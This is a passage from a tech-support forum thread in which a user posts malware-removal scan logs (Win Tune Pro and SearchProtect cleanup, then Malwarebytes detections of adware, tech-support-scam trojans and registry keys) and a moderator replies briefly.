    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\settings.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\style.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\defaults.js -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\uninstall.css -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\uninstall.html -> Deleted
    [PUP][File] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall\uninstall.js -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs\uninstall -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\dialogs -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI\rep -> Deleted
    [PUP][Folder] C:\Program Files (x86)\SearchProtect\UI -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Win Tune Pro -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ActiveBoost.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Autoupdater.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\BootDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\borlndmm.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\BrokenShortcutsFinder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\BrokenShortcutsLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\CommonForms.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ContextMenuManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskCleaner.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskCleanerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDefragLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDoctor.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDoctorLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskDoctorServer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DiskWiper.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\DuplicateFilesFinder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Export-Template.html -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\FastRegistrySearch.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\FileShredder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\FileShredderLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\GeneralLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Helper.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\i18n.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ImmunizationUSB.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ImmunizationUSBLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\InetOptimizerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\internetoptimizer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\BootDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\BrokenShortcutsFinder.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\CommonForms.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\ContextMenuManager.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskCleaner.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskDoctor.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DiskWiper.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\DuplicateFilesFinder.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\FastRegistrySearch.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\FileShredder.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\General.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\Immunization.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\ImmunizationUSB.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\InetOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\Integrator.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\InternetOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\LiveUpdate.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\MemoryDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RegCleaner.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RegistryDefrag.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RepairWizard.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\RescueManager.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SecurityOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SSDTweaker.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\StartupManager.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\StartupOptimizer.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SystemAdvisor.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\SystemSnapshot.i18n -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Lang\UninstallManager.i18n -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Win Tune Pro\Lang -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\LoggerService.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\lua5.1.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\madBasic_.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\madDisAsm_.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\madExcept_.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\main.ini -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\MemoryDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\MemoryDefragLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\NotifyHelper.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PngComponents170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ProductLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsComponents.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsGlobals.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsLocalizer.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\PsSharedForms.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegCleaner.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegCleanerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegDefragLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RegistryDefrag.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RepairWizard.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RescueCenterLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\RescueManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\rtl170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SDShlExt-x64.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SDShlExt.cfg -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SecurityOptimizer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SecurityOptimizerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\ServiceManagerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Shredder.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SKGL.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SSDTweaker.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\StartupManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\StartupManagerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\StartupOptimizer.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SystemAdvisorLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\SystemSnapshot.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\TaskSchedulerLib.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Telerik.WinControls.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Telerik.WinControls.UI.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\TelerikCommon.dll -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\IRIMG1.JPG -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\IRIMG2.JPG -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.dat -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.xml -> Deleted
    [PUP][Folder] C:\Program Files (x86)\Win Tune Pro\Uninstall -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\uninstall.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\UninstallManager.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\vcl170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\vclimg170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\vclx170.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\VirtualTreesR17.bpl -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\WINTUNEPRO.exe -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\WINTUNEPRO.exe.config -> Deleted
    [PUP][File] C:\Program Files (x86)\Win Tune Pro\xmlNative.bpl -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\bing-lavasoft.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\coldsearch.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\trovi.xml -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://navsmart.info -> Deleted
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Uninstall Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\UNINST~1.EXE "/U:C:\Program Files (x86)\Win Tune Pro\Uninstall\uninstall.xml" -> Removed at reboot [2]
    [PUP][File] C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro\Win Tune Pro.lnk [LNK@] C:\PROGRA~2\WINTUN~1\WINTUN~1.EXE -> Removed at reboot [2]
    [Tr.DnsPatcher|VT.Unknown][File] C:\Windows\System32\dnsapi.dll -> Replaced at reboot ( @Src Microsoft Cloud)
    [Tr.DnsPatcher|VT.Unknown][File] C:\Windows\SysWOW64\dnsapi.dll -> Replaced at reboot ( @Src Microsoft Cloud)

    ¤¤¤ WMI : 1 ¤¤¤
    [PUP.Yeahbests] instance (ActiveScriptEventConsumer) \ROOT\subscription:ActiveScriptEventConsumer.Name="ASEC" -> Not selected

    ¤¤¤ Hosts File : 0 [Too big!] ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

    ¤¤¤ Web browsers : 1 ¤¤¤
    [PUM.HomePage][FIREFX:Config] jruxmgi6.default : user_pref("browser.startup.homepage", "C:\\ProgramData\\Doubleings\\ff.HP"); -> Not selected

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: HGST HTS725032A7E630 ATA Device +++++
    --- User ---
    [MBR] 43e6003bcfd2cde94fe7410ba59b085c
    [BSP] d0c2410ab3a1197929f155287a951ad9 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 305243 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK
     
  7. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    That's fine. Go on...
     
  8. photiost

    photiost Established Techie7 Member

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 18/09/2016
    Scan Time: 8:12 PM
    Logfile: malware scan log1.txt
    Administrator: Yes

    Version: 2.2.1.1043
    Malware Database: v2016.09.18.07
    Rootkit Database: v2016.08.15.01
    License: Trial
    Malware Protection: Enabled
    Malicious Website Protection: Enabled
    Self-protection: Disabled

    OS: Windows 7 Service Pack 1
    CPU: x64
    File System: NTFS
    User: Administrator

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 545068
    Time Elapsed: 22 min, 33 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 5
    Rogue.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.exe, 1776, Delete-on-Reboot, [9a05046f85151b1b2b9f04eb8e76ba46]
    DDoSTool.Agent, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, 3908, Delete-on-Reboot, [e0bf9ed58e0c02343892308c0afac43c]
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.exe, 3148, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46]
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey\desktop189.exe, 1616, Delete-on-Reboot, [7b24aec5f5a56acc684eedf161a302fe]
    PUP.Optional.TempLaunch, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, 3908, Delete-on-Reboot, [a8f7155e1c7e48ee1334a328788a669a]

    Modules: 0
    (No malicious items detected)

    Registry Keys: 104
    Rogue.TechSupportScam, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\nrtService, Quarantined, [9a05046f85151b1b2b9f04eb8e76ba46],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{A9582D7B-F24A-441D-9D26-450D58F3CD17}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{14EF423E-3EE8-44AE-9337-07AC3F27B744}, Quarantined, [752acca7059565d17355ddba55ade11f],
    Adware.Kajajugt, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}, Quarantined, [752acca7059565d17355ddba55ade11f],
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}, Quarantined, [faa5cda632688ea8b0bb3d5ac04224dc],
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}, Quarantined, [faa5cda632688ea8b0bb3d5ac04224dc],
    PUP.Optional.ConvertAd, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\PopupProduct, Quarantined, [4b54a2d1afebb58128a7a6f692718080],
    PUP.Optional.WizzWifiHotspot, HKLM\SOFTWARE\Wizzwifihotspot, Quarantined, [f1aed79c42581f174059db1fc0436a96],
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\ICATTI, Quarantined, [712ecda69505da5c6641e7129e65a35d],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\CLASSES\PCSU.Registry, Quarantined, [5946244f732721150c0d01ae04ffcf31],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\CLASSES\PCSU.Registry.1, Quarantined, [e4bb88eb8e0caa8cf029cae58083926e],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [9b043e35c6d42016d59505c41fe3a55b],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{2F23AB71-4AC6-41F2-A955-EA576E553146}, Quarantined, [504feb88fd9dbe7844265871c141a55b],
    PUP.Optional.EasyHotSpot, HKLM\SOFTWARE\MICROSOFT\TRACING\easyhotspot-installer_RASAPI32, Quarantined, [7926294a2377e452218c609ddf24ca36],
    PUP.Optional.EasyHotSpot, HKLM\SOFTWARE\MICROSOFT\TRACING\easyhotspot-installer_RASMANCS, Quarantined, [a4fb5f14e6b47cba7e2f3bc243c0d927],
    PUP.Optional.IDSCProduct, HKLM\SOFTWARE\MICROSOFT\TRACING\idscservice_RASAPI32, Quarantined, [ccd3e09388128ea8a90cc3383dc6b749],
    PUP.Optional.IDSCProduct, HKLM\SOFTWARE\MICROSOFT\TRACING\idscservice_RASMANCS, Quarantined, [6e31e3902d6d88aea2132dce8b78f010],
    PUP.Optional.WizzCaster, HKLM\SOFTWARE\MICROSOFT\TRACING\wizzcaster_RASAPI32, Quarantined, [5c43551e6c2e280ec548ce30976c7c84],
    PUP.Optional.WizzCaster, HKLM\SOFTWARE\MICROSOFT\TRACING\wizzcaster_RASMANCS, Quarantined, [821d284ba7f348ee27e6a85660a3c739],
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR , Quarantined, [4a5597dc4a50b87e5bdfaa0f31d24db3],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [188721529ffbf24411f46678de2557a9],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [eab5660dceccdd59e125cf0fe2214bb5],
    PUP.Optional.TTWifi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11B0901B-7817-4D91-9457-0870BE557C0A}, Delete-on-Reboot, [118e0a69c8d2ec4af7812ecf10f38977],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{11E0260B-A1B3-4C76-92FB-E4E45BBE5BA6}, Delete-on-Reboot, [2a7580f38317c76f50706e83f50e7f81],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{20CC1331-B6C8-4E07-87C2-17BBB66FF2E6}, Delete-on-Reboot, [f0afa3d0ff9b66d0ae0f1addcc37dd23],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{33AA5276-F186-4F36-B614-FACEF7D12B73}, Delete-on-Reboot, [e5ba482beab0ee48358a40b13dc6a957],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4DFEE54D-5A75-4674-9599-2CF0C1235984}, Delete-on-Reboot, [455ae291bddd65d1734d9c55956ead53],
    Trojan.TechSupportScam, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4F4D22B5-7496-4CF9-9984-12320C3EEE6C}, Delete-on-Reboot, [514e3a394753fe382dff2ac55fa57789],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5AECB8E6-6A1D-4416-A94E-63AB73367CB3}, Delete-on-Reboot, [eeb1dc974c4e0333bd02826f9370c53b],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9CF158C5-EBBF-4534-947A-C011B643E9A5}, Delete-on-Reboot, [029de98acfcb6bcbe6d99e5331d260a0],
    PUP.Optional.SearchProtect.Gen, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B4C9453B-5317-4006-9B25-BD4D32EE1256}, Delete-on-Reboot, [9f00e390356572c4c20a2ecb3cc77a86],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{EBD0F564-06A8-4CFE-8FF2-6C151538BA74}, Delete-on-Reboot, [e7b8abc86b2feb4bee8001ee25de12ee],
    PUP.Optional.TempLaunch, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F3A5846C-8CA4-4CEF-8D20-35484B32105D}, Delete-on-Reboot, [9c032e457b1f4ee8a0a8b318738f39c7],
    PUP.Optional.SearchProtect.Gen, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\bvyvcvd, Delete-on-Reboot, [b2ede78c2c6e93a36f5e9c5d4bb86799],
    Trojan.TechSupportScam, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\nerta, Delete-on-Reboot, [900fe2911f7bdc5a84a9d81709fb8f71],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\PC SpeedUp Service Deactivator, Delete-on-Reboot, [920d0e658614c6706bb2eac5a1624cb4],
    PUP.Optional.TempLaunch, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Pritc, Delete-on-Reboot, [5a453142940680b600497a51bc466898],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SMW_P, Delete-on-Reboot, [3b64195acad0280efac45c9b52b17789],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System Healer Task, Delete-on-Reboot, [9f00096a544639fd0ea08a50ff043ac6],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System HealerPeriod, Delete-on-Reboot, [2976f380abef1a1cf5b9a5352ad927d9],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System HealerStartUp, Delete-on-Reboot, [c5da0d664d4d4aec7e30d703e91a7f81],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SystemHealer Monitor, Delete-on-Reboot, [524d6b083d5dfe3899167961ff0422de],
    PUP.Optional.SystemHealer, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SystemHealer Run Delay, Delete-on-Reboot, [910ef083ff9bb5812788ca100af9748c],
    PUP.Optional.TTWifi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ttwifi, Delete-on-Reboot, [b6e9e68d2a70e94d1c5de815e221c13f],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SMU.EXE, Quarantined, [dac53b38b5e57bbbaf4c797d5aa91de3],
    PUP.Optional.Goobzo, HKLM\SOFTWARE\SEARCHMODULE\INFO, Quarantined, [7c237003ddbdf2440466427e38cb6d93],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\mtDoubleing, Quarantined, [b9e64a296b2f7bbbfd2d0dec25de5ca4],
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\mtRonzap, Quarantined, [58479fd4f9a13ff70f37d52148bbf709],
    PUP.Optional.Tuto4PC, HKLM\SOFTWARE\WOW6432NODE\Tutorials, Quarantined, [d1cec0b32773270f90369f2cfa0a619f],
    PUP.Optional.VBates.Gen, HKLM\SOFTWARE\WOW6432NODE\ICATTI, Quarantined, [f3acdf94a6f4ce68b0f7708908fbf50b],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\CLASSES\PCSU.Registry, Quarantined, [abf47201cdcdfa3cfd1cab04917231cf],
    PUP.Optional.PCSpeedUp, HKLM\SOFTWARE\WOW6432NODE\CLASSES\PCSU.Registry.1, Quarantined, [a2fddf942d6d9f97cb4e456aba49b14f],
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\IELNKSRCH, Quarantined, [dec12e453c5e80b6c8565d9730d348b8],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [653a40332773bf779cce5c6dec16bf41],
